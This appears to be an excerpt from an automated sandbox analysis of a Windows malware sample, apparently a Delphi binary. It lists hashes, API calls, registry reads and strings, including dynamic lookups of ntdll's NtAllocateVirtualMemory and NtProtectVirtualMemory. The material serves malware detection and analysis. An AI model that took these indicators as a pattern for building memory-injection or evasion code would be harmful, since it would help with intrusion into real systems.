                  • Instruction ID: bf23bd67f75abb2fdd3842368f76db7bbec2037e204a5e97f5bbbe8ad0c1631c
                  • Opcode Fuzzy Hash: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
                  • Instruction Fuzzy Hash: 121100B5A00209AFDB40CF99CC819AFF7F9FFC8300B14C569A408E7254E6319E018BA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0280A79E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                  • Instruction ID: 1cad008d29acaeca29962f6b6746c8b152e672c9e36b1770616b826115689ee9
                  • Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                  • Instruction Fuzzy Hash: 63E0D87D70021817D354A55C5CC1AFA725DA75C710F00817EBF58C73C1EEA0AD404AE5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetVersionExA.KERNEL32(?,0282A106,00000000,0282A11E), ref: 0280B756
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: 596ffb0b0a72bca8ff902ab0f407d9f68f78b8c0e221abb49ee5906580b44145
                  • Instruction ID: 58879b81eb68ab35d3a03bb776c70d3764bb5f418c070844315ad59c95f5944e
                  • Opcode Fuzzy Hash: 596ffb0b0a72bca8ff902ab0f407d9f68f78b8c0e221abb49ee5906580b44145
                  • Instruction Fuzzy Hash: 5EF0A47C9463019FD3A0DF28D88071577E5FB88718F018D2DE898C73C0E734A8588B52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0280BE2E,00000000,0280C047,?,?,00000000,00000000), ref: 0280A7DF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                  • Instruction ID: 47075e77be29f23b310369a1fd302ca771f75c33f34677bcd1be867f8bef9fa8
                  • Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                  • Instruction Fuzzy Hash: 7AD05B6E30D26439A224915E1DC4D775AECCAC5761F00443DB688C6141D2008C059671
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: LocalTime
                  • String ID:
                  • API String ID: 481472006-0
                  • Opcode ID: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                  • Instruction ID: a46af62c88433172b392514776db2b4f2dcc1b0ed5ee47218aa605a66c0b45c4
                  • Opcode Fuzzy Hash: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                  • Instruction Fuzzy Hash: E8A011088088320282803B2C0C0323A3088A800A20FC80B80A8F8802E2FA2E023880E3
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.000000000286C000.00000040.00001000.00020000.00000000.sdmp, Offset: 0286C000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_286c000_SecuriteInfo.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                  • Instruction ID: 1fe3f8a124f8aa9f557be62bbdb897410e8663d3bb1ccc7d4d0671c1945c6492
                  • Opcode Fuzzy Hash: 2d5486f6e5b9d9d61447aadb6395f99df315b0362e95f2a9dd6700af68e1202b
                  • Instruction Fuzzy Hash: 83F0823E214290CFD721DE19EACCF79B3A8EB44678F1D046BD588D7151C320E844C758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0280D259
                    • Part of subcall function 0280D224: GetProcAddress.KERNEL32(00000000), ref: 0280D23D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                  • API String ID: 1646373207-1918263038
                  • Opcode ID: 6182faac33a15ec57b31ee150a0f6132b4ecac4bd31ba161f995fc3c9934f029
                  • Instruction ID: 7bc3532fbe69020fa67641de4fa96c1addfcd93fea8ba0bf71dc7bd070f9b318
                  • Opcode Fuzzy Hash: 6182faac33a15ec57b31ee150a0f6132b4ecac4bd31ba161f995fc3c9934f029
                  • Instruction Fuzzy Hash: AC414F6DA44204AB52E87BED7CC443F77DAD749710370A50AF614CB7C0DEA0BC5A8E2A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02816E9A
                  • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02816EAB
                  • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02816EBB
                  • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02816ECB
                  • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02816EDB
                  • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02816EEB
                  • GetProcAddress.KERNEL32 ref: 02816EFB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                  • API String ID: 667068680-2233174745
                  • Opcode ID: bc05d88631c6d71f4b6f5c7fdec7258c0b5e25db83582c0bca7f06863f80c0d1
                  • Instruction ID: 333416558a61c49590b3d257a23608e525d43bfb238344abe6d412ffe4cf215c
                  • Opcode Fuzzy Hash: bc05d88631c6d71f4b6f5c7fdec7258c0b5e25db83582c0bca7f06863f80c0d1
                  • Instruction Fuzzy Hash: E5F01CECACB3746DB6506BB85CC292A375D9911608B42581DB477E6EC2FAB884348F21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028028CE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message
                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                  • API String ID: 2030045667-32948583
                  • Opcode ID: 53210bca661932742782ecec18ff2e615957a0d477922e4ef0dd465d9acd62ab
                  • Instruction ID: de2462d44bd3381b4d948bfb9caf9d2ea20e8080a7f5c93f2b95474a74e27e2c
                  • Opcode Fuzzy Hash: 53210bca661932742782ecec18ff2e615957a0d477922e4ef0dd465d9acd62ab
                  • Instruction Fuzzy Hash: 69A1F43CA042648BDFA19A2CCCC8B9876E5EB09314F1441E5DD4DDB2CACBF59989CF51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 0281A078
                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 0281A08F
                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 0281A095
                  • IsBadReadPtr.KERNEL32(?,00000004), ref: 0281A123
                  • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 0281A12F
                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 0281A143
                  Strings
                  • LoadLibraryExA, xrefs: 0281A085
                  • C:\Windows\System32\KernelBase.dll, xrefs: 0281A08A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Read$AddressHandleModuleProc
                  • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                  • API String ID: 1061262613-1650066521
                  • Opcode ID: f9316e1975e4f6b1b37935b6dd1b40733fd8b8c09b543f63c601fef7c263f1a5
                  • Instruction ID: 280304c977494847224f463107a771d38ac290dc3b2c556dcfe2c6ac0b91fec4
                  • Opcode Fuzzy Hash: f9316e1975e4f6b1b37935b6dd1b40733fd8b8c09b543f63c601fef7c263f1a5
                  • Instruction Fuzzy Hash: A931807DA41214BFDB24DFA8CC85F5A77ACAF05368F044614EA19EB2C1E334E950CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Strings
                  • An unexpected memory leak has occurred. , xrefs: 02802690
                  • Unexpected Memory Leak, xrefs: 028028C0
                  • bytes: , xrefs: 0280275D
                  • The unexpected small block leaks are:, xrefs: 02802707
                  • 7, xrefs: 028026A1
                  • , xrefs: 02802814
                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02802849
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                  • API String ID: 0-2723507874
                  • Opcode ID: 6e29b090c5edb8416634ddc9ec818c53dedec548a0e4a97ca544208eb9e183a7
                  • Instruction ID: 626795d015b92b75eaf2c5a385bfe32616302ed736b25525988d09f99d59c46a
                  • Opcode Fuzzy Hash: 6e29b090c5edb8416634ddc9ec818c53dedec548a0e4a97ca544208eb9e183a7
                  • Instruction Fuzzy Hash: 4471D33CA042588ADFA19A2CCCC8B99B6E5EB09714F1040E5D94DD72CACBF55989CF52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetThreadLocale.KERNEL32(00000000,0280C047,?,?,00000000,00000000), ref: 0280BDB2
                    • Part of subcall function 0280A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0280A79E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Locale$InfoThread
                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                  • API String ID: 4232894706-2493093252
                  • Opcode ID: 5e60374449178a6b44e2b08a07c3b2bf888b43ad46e4abee937d708dfa204482
                  • Instruction ID: d5b70fdd0f2a4c8f9d949868db6c1845340f059f05278e970b588a831d9ac22d
                  • Opcode Fuzzy Hash: 5e60374449178a6b44e2b08a07c3b2bf888b43ad46e4abee937d708dfa204482
                  • Instruction Fuzzy Hash: 0061403CB412489BDB85EBA8DCD0A9F77B79B48300F109575E201DB3C1CA78D9098B96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028043E7,?,?,028637C8,?,?,0282B7A8,02806575,0282A305), ref: 02804359
                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028043E7,?,?,028637C8,?,?,0282B7A8,02806575,0282A305), ref: 0280435F
                  • GetStdHandle.KERNEL32(000000F5,028043A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028043E7,?,?,028637C8), ref: 02804374
                  • WriteFile.KERNEL32(00000000,000000F5,028043A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028043E7,?,?), ref: 0280437A
                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02804398
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileHandleWrite$Message
                  • String ID: Error$Runtime error at 00000000
                  • API String ID: 1570097196-2970929446
                  • Opcode ID: 5beac9fe8e968ed8bf917458c9dde36e4775d63d9adf43c3fa297406ea90b3a7
                  • Instruction ID: bb44936d090fac2aafdbfdbb17a5f101bad5c52b21f69852378c43d0dda41508
                  • Opcode Fuzzy Hash: 5beac9fe8e968ed8bf917458c9dde36e4775d63d9adf43c3fa297406ea90b3a7
                  • Instruction Fuzzy Hash: 2BF0F0ADEC1340B9FB90E264ACCEF5A371C0B44B25F142A14F32CE42C287A458C89B22
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 0280ACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0280AD15
                    • Part of subcall function 0280ACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0280AD39
                    • Part of subcall function 0280ACF8: GetModuleFileNameA.KERNEL32(02800000,?,00000105), ref: 0280AD54
                    • Part of subcall function 0280ACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0280ADEA
                  • CharToOemA.USER32(?,?), ref: 0280AEB7
                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0280AED4
                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0280AEDA
                  • GetStdHandle.KERNEL32(000000F4,0280AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0280AEEF
                  • WriteFile.KERNEL32(00000000,000000F4,0280AF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0280AEF5
                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 0280AF17
                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0280AF2D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                  • String ID:
                  • API String ID: 185507032-0
                  • Opcode ID: 8dda7d66441a4aa6360f184bbf844cd4ac116be54b57fa8eb136b91e43600c85
                  • Instruction ID: 0b7022c84cbe706f105181d912d9166e6c2593b8d21db3df08f8154c27a81333
                  • Opcode Fuzzy Hash: 8dda7d66441a4aa6360f184bbf844cd4ac116be54b57fa8eb136b91e43600c85
                  • Instruction Fuzzy Hash: 621170BE554305BED280EBA8CCC5F8B73EDAB44700F404A25B754D60E0EA74E9548F27
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0280E5E1
                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0280E5FD
                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0280E636
                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0280E6B3
                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0280E6CC
                  • VariantCopy.OLEAUT32(?,00000000), ref: 0280E701
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                  • String ID:
                  • API String ID: 351091851-0
                  • Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                  • Instruction ID: 4b550b1950667d6419cb5c6df858c4c1f97f46132bab6881bf9b14ddab1252e3
                  • Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                  • Instruction Fuzzy Hash: 4751C7BD9006299BCBA2DB98CCD0B9AB3BDAF49300F0445D5E508E7252D770AF858F65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0280357E
                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028035CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028035B1
                  • RegCloseKey.ADVAPI32(?,028035D4,00000000,?,00000004,00000000,028035CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028035C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                  • API String ID: 3677997916-4173385793
                  • Opcode ID: 2a430e9396e24a5b9aeb0238a64fc559cf1e2d76ec7bf7dc5f0a5bf7c1400b68
                  • Instruction ID: 0f93d3a3af837c159c19f3aadee36e0721fcc7f5e09626834840a2aaadf391eb
                  • Opcode Fuzzy Hash: 2a430e9396e24a5b9aeb0238a64fc559cf1e2d76ec7bf7dc5f0a5bf7c1400b68
                  • Instruction Fuzzy Hash: 2201B57DA50208BAEB61DBD18C82BBDB3ECEB08710F1045A2BA14D66C0E6749614DB55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetThreadLocale.KERNEL32(?,00000000,0280AAA3,?,?,00000000), ref: 0280AA24
                    • Part of subcall function 0280A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0280A79E
                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0280AAA3,?,?,00000000), ref: 0280AA54
                  • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 0280AA5F
                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0280AAA3,?,?,00000000), ref: 0280AA7D
                  • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 0280AA88
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Locale$InfoThread$CalendarEnum
                  • String ID:
                  • API String ID: 4102113445-0
                  • Opcode ID: 506ec073f7a4e77ba444fbfe0af9ee5610d0f1963b4dc18e990285d704682c27
                  • Instruction ID: d9ef1207de357be0b4e21e03be7066ef13e5cba43610a381b08b4096c9a9fb7f
                  • Opcode Fuzzy Hash: 506ec073f7a4e77ba444fbfe0af9ee5610d0f1963b4dc18e990285d704682c27
                  • Instruction Fuzzy Hash: 9801477C3003143FF395AA7CCD92B6E725DCB45720F500160E310E62C0E6689E204AA6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 0280352C: GetKeyboardType.USER32(00000000), ref: 02803531
                    • Part of subcall function 0280352C: GetKeyboardType.USER32(00000001), ref: 0280353D
                  • GetCommandLineA.KERNEL32 ref: 0282A06C
                  • GetACP.KERNEL32 ref: 0282A080
                  • GetCurrentThreadId.KERNEL32 ref: 0282A08A
                    • Part of subcall function 0280355C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0280357E
                    • Part of subcall function 0280355C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028035CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028035B1
                    • Part of subcall function 0280355C: RegCloseKey.ADVAPI32(?,028035D4,00000000,?,00000004,00000000,028035CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028035C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardType$CloseCommandCurrentLineOpenQueryThreadValue
                  • String ID: 8&e
                  • API String ID: 3316616684-725580745
                  • Opcode ID: 065d362f438b8f4bb98d7c3cce75a11c79ca0f46b5dc81e17100aa2cc51083b4
                  • Instruction ID: c9f2074a48d44a3b3c9bf8e7347580853ad8e10fa6763f251ccf5cb206438933
                  • Opcode Fuzzy Hash: 065d362f438b8f4bb98d7c3cce75a11c79ca0f46b5dc81e17100aa2cc51083b4
                  • Instruction Fuzzy Hash: 9B41C3AD84E7C18FD7439B749D693457FB06F23209F0A14CBC084DE2E7E2680959CB66
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetThreadLocale.KERNEL32(?,00000000,0280AC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0280AAEB
                    • Part of subcall function 0280A780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0280A79E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: Locale$InfoThread
                  • String ID: eeee$ggg$yyyy
                  • API String ID: 4232894706-1253427255
                  • Opcode ID: 50e92584d94c9921a1abd5819f65b865fac2c407f1f1b70f41c951f9808debef
                  • Instruction ID: 2101771211952726596a129857b71f6e54bfcb0152537b40ce57fd7fb748c24d
                  • Opcode Fuzzy Hash: 50e92584d94c9921a1abd5819f65b865fac2c407f1f1b70f41c951f9808debef
                  • Instruction Fuzzy Hash: 4A41D13C7043084BE7D9EBBD8CE02BEB3ABDB85304B554525D781C73E4D634AD068A22
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02817975
                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0281797B
                  Strings
                  • NtAllocateVirtualMemory, xrefs: 0281796B
                  • C:\Windows\System32\ntdll.dll, xrefs: 02817970
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                  • API String ID: 1646373207-2206134580
                  • Opcode ID: 8a44a0e69d7a10b86fdfc75877794afc6cb76c49fef482098d4978cd99e648c2
                  • Instruction ID: 9ced22c5521f94313807f172b019f692781c2a144a50defbd87dda1ffa4be336
                  • Opcode Fuzzy Hash: 8a44a0e69d7a10b86fdfc75877794afc6cb76c49fef482098d4978cd99e648c2
                  • Instruction Fuzzy Hash: 54E09ABE68020CBFDB40DE98DC85EDA77ACAB08711F044415FA19D7281D774E9648BB5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02817975
                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0281797B
                  Strings
                  • NtAllocateVirtualMemory, xrefs: 0281796B
                  • C:\Windows\System32\ntdll.dll, xrefs: 02817970
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                  • API String ID: 1646373207-2206134580
                  • Opcode ID: 8ddf28d10a18d87f8b6dcfc0eedd33fc8d74b76f924729fec3f79390e6af07a0
                  • Instruction ID: b50047db01243422d520ba2b7eb738bfb461edce61ef9748adb4502a8fcc3dee
                  • Opcode Fuzzy Hash: 8ddf28d10a18d87f8b6dcfc0eedd33fc8d74b76f924729fec3f79390e6af07a0
                  • Instruction Fuzzy Hash: ACE09ABE58020CBFDB40DE98DC85EDA77ACAB08711F044415FA19D7281D774E5648BB5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 02817A09
                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02817A0F
                  Strings
                  • NtProtectVirtualMemory, xrefs: 028179FF
                  • C:\Windows\System32\ntdll.dll, xrefs: 02817A04
                  Memory Dump Source
                  • Source File: 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, Offset: 02800000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2800000_SecuriteInfo.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                  • API String ID: 1646373207-1386159242
                  • Opcode ID: 3031dd2f91e2029218278a6e032c89a285c261d27861502e42c1a91aca72b348
                  • Instruction ID: 5eee5ae44622759b26a3bbb2cdbf97686addd4e8c53b23c40e4e2118024428e6
                  • Opcode Fuzzy Hash: 3031dd2f91e2029218278a6e032c89a285c261d27861502e42c1a91aca72b348
                  • Instruction Fuzzy Hash: D4E0B6BE640209AF9B80EEDDEC85D8B77ECAB18200B045415FA1AD7281D634E9619FB1
                  Uniqueness

                  Uniqueness Score: -1.00%
